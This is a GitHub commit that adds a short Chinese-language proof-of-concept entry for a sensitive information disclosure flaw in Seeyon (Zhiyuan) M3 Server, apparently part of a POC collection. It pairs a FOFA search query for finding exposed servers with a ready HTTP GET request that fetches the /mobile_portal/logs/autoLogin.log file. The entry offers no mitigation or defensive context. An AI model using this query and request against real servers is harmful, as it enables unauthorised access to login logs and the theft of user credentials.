Create 致远M3敏感信息泄露漏洞.md

This commit is contained in:
wy876 2024-05-08 20:10:05 +08:00 committed by GitHub
parent b1771adc7b
commit ef9d4078ec
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194

View File

@ -0,0 +1,19 @@
## 致远M3敏感信息泄露漏洞
## fofa
```
title="M3-Server"
```
## poc
```
GET /mobile_portal/logs/autoLogin.log HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close
```
![e5b392d5ab145b5acba296fcf2ea09c8](https://github.com/wy876/POC/assets/139549762/9e4e58b3-75d0-4f98-974b-391397fba2e4)